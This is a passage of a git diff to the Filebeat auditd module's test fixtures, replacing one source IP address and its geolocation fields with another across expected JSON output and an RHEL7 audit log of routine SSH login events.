         "process.executable": "/usr/sbin/sshd",
         "process.pid": 28281,
         "service.type": "auditd",
-        "source.address": "96.241.146.97",
-        "source.as.number": 701,
-        "source.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "source.geo.city_name": "Aldie",
+        "source.address": "216.160.83.61",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
         "source.geo.continent_name": "North America",
         "source.geo.country_iso_code": "US",
         "source.geo.country_name": "United States",
-        "source.geo.location.lat": 38.9637,
-        "source.geo.location.lon": -77.6099,
-        "source.geo.region_iso_code": "US-VA",
-        "source.geo.region_name": "Virginia",
-        "source.ip": "96.241.146.97",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.61",
         "user.audit.id": "700",
         "user.id": "0",
         "user.saved.id": "74"
@@ -321,7 +320,7 @@
         "event.dataset": "auditd.log",
         "event.kind": "event",
         "event.module": "auditd",
-        "event.original": "type=USER_AUTH msg=audit(1489636960.072:19623789): user pid=28281 uid=0 auid=700 ses=6793 msg='op=success acct=\"admin\" exe=\"/usr/sbin/sshd\" hostname=? addr=96.241.146.97 terminal=ssh res=success'",
+        "event.original": "type=USER_AUTH msg=audit(1489636960.072:19623789): user pid=28281 uid=0 auid=700 ses=6793 msg='op=success acct=\"admin\" exe=\"/usr/sbin/sshd\" hostname=? addr=216.160.83.61 terminal=ssh res=success'",
         "event.outcome": "success",
         "event.type": [
             "info"
@@ -332,18 +331,17 @@
         "process.executable": "/usr/sbin/sshd",
         "process.pid": 28281,
         "service.type": "auditd",
-        "source.address": "96.241.146.97",
-        "source.as.number": 701,
-        "source.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "source.geo.city_name": "Aldie",
+        "source.address": "216.160.83.61",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
         "source.geo.continent_name": "North America",
         "source.geo.country_iso_code": "US",
         "source.geo.country_name": "United States",
-        "source.geo.location.lat": 38.9637,
-        "source.geo.location.lon": -77.6099,
-        "source.geo.region_iso_code": "US-VA",
-        "source.geo.region_name": "Virginia",
-        "source.ip": "96.241.146.97",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.61",
         "user.audit.id": "700",
         "user.effective.name": "admin",
         "user.id": "700",
diff --git a/filebeat/module/auditd/log/test/audit-rhel7.log b/filebeat/module/auditd/log/test/audit-rhel7.log
index 4b193c8d559f..646215d70dfc 100644
--- a/filebeat/module/auditd/log/test/audit-rhel7.log
+++ b/filebeat/module/auditd/log/test/audit-rhel7.log
@@ -721,77 +721,77 @@ type=USER_MGMT msg=audit(1481076992.534:400): pid=1285 uid=0 auid=4294967295 ses
 type=USER_MGMT msg=audit(1481076992.534:401): pid=1285 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:unconfined_service_t:s0 msg='op=add-user-to-shadow-group grp="google-sudoers" acct="some_user" exe="/usr/sbin/usermod" hostname=? addr=? terminal=? res=success'
 type=USYS_CONFIG msg=audit(1481076993.000:402): pid=1232 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:unconfined_service_t:s0 msg='changing system time exe="/usr/sbin/hwclock" hostname=? addr=? terminal=? res=success'
 type=SERVICE_STOP msg=audit(1481077001.763:403): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=NetworkManager-dispatcher comm="systemd" exe="/usr/lib/systemd/systemd" hostname=? addr=? terminal=? res=success'
-type=CRYPTO_KEY_USER msg=audit(1481077041.497:404): pid=1299 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1299 suid=0  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=CRYPTO_KEY_USER msg=audit(1481077041.497:405): pid=1299 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1299 suid=0  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=CRYPTO_SESSION msg=audit(1481077041.515:406): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-server cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1299 suid=74 rport=63927 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=CRYPTO_SESSION msg=audit(1481077041.515:407): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-client cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1299 suid=74 rport=63927 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=USER_AUTH msg=audit(1481077043.046:408): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=pubkey_auth rport=63927 acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=USER_AUTH msg=audit(1481077043.046:409): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=key algo=ssh-rsa size=2048 fp=ea:4e:a7:19:2a:35:b9:0f:ee:6c:76:f3:3f:52:e4:73 rport=63927 acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=USER_ACCT msg=audit(1481077043.052:410): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:accounting grantors=pam_unix,pam_localuser acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success'
-type=CRYPTO_KEY_USER msg=audit(1481077043.053:411): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1299 suid=74 rport=63927 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=USER_AUTH msg=audit(1481077043.054:412): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=success acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=ssh res=success'
-type=CRED_ACQ msg=audit(1481077043.057:413): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success'
+type=CRYPTO_KEY_USER msg=audit(1481077041.497:404): pid=1299 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1299 suid=0  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=CRYPTO_KEY_USER msg=audit(1481077041.497:405): pid=1299 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1299 suid=0  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=CRYPTO_SESSION msg=audit(1481077041.515:406): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-server cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1299 suid=74 rport=63927 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=CRYPTO_SESSION msg=audit(1481077041.515:407): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-client cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1299 suid=74 rport=63927 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=USER_AUTH msg=audit(1481077043.046:408): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=pubkey_auth rport=63927 acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=USER_AUTH msg=audit(1481077043.046:409): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=key algo=ssh-rsa size=2048 fp=ea:4e:a7:19:2a:35:b9:0f:ee:6c:76:f3:3f:52:e4:73 rport=63927 acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=USER_ACCT msg=audit(1481077043.052:410): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:accounting grantors=pam_unix,pam_localuser acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success'
+type=CRYPTO_KEY_USER msg=audit(1481077043.053:411): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1299 suid=74 rport=63927 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=USER_AUTH msg=audit(1481077043.054:412): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=success acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=ssh res=success'
+type=CRED_ACQ msg=audit(1481077043.057:413): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success'
 type=LOGIN msg=audit(1481077043.057:414): pid=1298 uid=0 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 old-auid=4294967295 auid=1000 old-ses=4294967295 ses=1 res=1
-type=USER_ROLE_CHANGE msg=audit(1481077043.140:415): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='pam: default-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 selected-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success'
-type=USER_START msg=audit(1481077043.170:416): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:session_open grantors=pam_selinux,pam_loginuid,pam_selinux,pam_namespace,pam_keyinit,pam_keyinit,pam_limits,pam_systemd,pam_unix,pam_lastlog acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success'
-type=CRYPTO_KEY_USER msg=audit(1481077043.170:417): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1298 suid=0 rport=63927 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=CRYPTO_KEY_USER msg=audit(1481077043.171:418): pid=1301 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1301 suid=0  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=CRYPTO_KEY_USER msg=audit(1481077043.171:419): pid=1301 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1301 suid=0  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=CRED_ACQ msg=audit(1481077043.172:420): pid=1301 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success'
-type=USER_LOGIN msg=audit(1481077043.193:421): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=/dev/pts/0 res=success'
-type=USER_START msg=audit(1481077043.194:422): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=/dev/pts/0 res=success'
+type=USER_ROLE_CHANGE msg=audit(1481077043.140:415): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='pam: default-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 selected-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success'
+type=USER_START msg=audit(1481077043.170:416): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:session_open grantors=pam_selinux,pam_loginuid,pam_selinux,pam_namespace,pam_keyinit,pam_keyinit,pam_limits,pam_systemd,pam_unix,pam_lastlog acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success'
+type=CRYPTO_KEY_USER msg=audit(1481077043.170:417): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1298 suid=0 rport=63927 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=CRYPTO_KEY_USER msg=audit(1481077043.171:418): pid=1301 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1301 suid=0  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=CRYPTO_KEY_USER msg=audit(1481077043.171:419): pid=1301 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1301 suid=0  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=CRED_ACQ msg=audit(1481077043.172:420): pid=1301 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success'
+type=USER_LOGIN msg=audit(1481077043.193:421): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=/dev/pts/0 res=success'
+type=USER_START msg=audit(1481077043.194:422): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=/dev/pts/0 res=success'
 type=USER_END msg=audit(1481077049.033:423): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=? addr=? terminal=/dev/pts/0 res=success'
 type=USER_LOGOUT msg=audit(1481077049.033:424): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=? addr=? terminal=/dev/pts/0 res=success'
-type=CRYPTO_KEY_USER msg=audit(1481077049.054:425): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1301 suid=1000 rport=63927 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=USER_END msg=audit(1481077049.057:426): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:session_close grantors=pam_selinux,pam_loginuid,pam_selinux,pam_namespace,pam_keyinit,pam_keyinit,pam_limits,pam_systemd,pam_unix,pam_lastlog acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success'
-type=CRED_DISP msg=audit(1481077049.058:427): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success'
-type=CRYPTO_KEY_USER msg=audit(1481077049.058:428): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1298 suid=0  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=CRYPTO_KEY_USER msg=audit(1481077049.058:429): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1298 suid=0  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=CRYPTO_KEY_USER msg=audit(1481077072.307:430): pid=1325 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1325 suid=0  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=CRYPTO_KEY_USER msg=audit(1481077072.307:431): pid=1325 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1325 suid=0  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=CRYPTO_SESSION msg=audit(1481077072.328:432): pid=1324 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-server cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1325 suid=74 rport=63929 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=CRYPTO_SESSION msg=audit(1481077072.328:433): pid=1324 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-client cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1325 suid=74 rport=63929 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=USER_AUTH msg=audit(1481077072.487:434): pid=1324 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=pubkey_auth rport=63929 acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=USER_AUTH msg=audit(1481077072.487:435): pid=1324 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=key algo=ssh-rsa size=2048 fp=ea:4e:a7:19:2a:35:b9:0f:ee:6c:76:f3:3f:52:e4:73 rport=63929 acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=USER_ACCT msg=audit(1481077072.491:436): pid=1324 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:accounting grantors=pam_unix,pam_localuser acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success'
-type=CRYPTO_KEY_USER msg=audit(1481077072.493:437): pid=1324 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1325 suid=74 rport=63929 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=USER_AUTH msg=audit(1481077072.493:438): pid=1324 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=success acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=ssh res=success'
-type=CRED_ACQ msg=audit(1481077072.494:439): pid=1324 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success'
+type=CRYPTO_KEY_USER msg=audit(1481077049.054:425): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1301 suid=1000 rport=63927 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=USER_END msg=audit(1481077049.057:426): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:session_close grantors=pam_selinux,pam_loginuid,pam_selinux,pam_namespace,pam_keyinit,pam_keyinit,pam_limits,pam_systemd,pam_unix,pam_lastlog acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success'
+type=CRED_DISP msg=audit(1481077049.058:427): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success'
+type=CRYPTO_KEY_USER msg=audit(1481077049.058:428): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1298 suid=0  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=CRYPTO_KEY_USER msg=audit(1481077049.058:429): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1298 suid=0  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=CRYPTO_KEY_USER msg=audit(1481077072.307:430): pid=1325 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1325 suid=0  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=CRYPTO_KEY_USER msg=audit(1481077072.307:431): pid=1325 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1325 suid=0  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=CRYPTO_SESSION msg=audit(1481077072.328:432): pid=1324 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-server cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1325 suid=74 rport=63929 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=CRYPTO_SESSION msg=audit(1481077072.328:433): pid=1324 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-client cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1325 suid=74 rport=63929 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=USER_AUTH msg=audit(1481077072.487:434): pid=1324 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=pubkey_auth rport=63929 acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=USER_AUTH msg=audit(1481077072.487:435): pid=1324 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=key algo=ssh-rsa size=2048 fp=ea:4e:a7:19:2a:35:b9:0f:ee:6c:76:f3:3f:52:e4:73 rport=63929 acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=USER_ACCT msg=audit(1481077072.491:436): pid=1324 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:accounting grantors=pam_unix,pam_localuser acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success'
+type=CRYPTO_KEY_USER msg=audit(1481077072.493:437): pid=1324 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1325 suid=74 rport=63929 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=USER_AUTH msg=audit(1481077072.493:438): pid=1324 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=success acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=ssh res=success'
+type=CRED_ACQ msg=audit(1481077072.494:439): pid=1324 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success'
 type=LOGIN msg=audit(1481077072.495:440): pid=1324 uid=0 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 old-auid=4294967295 auid=1000 old-ses=4294967295 ses=2 res=1
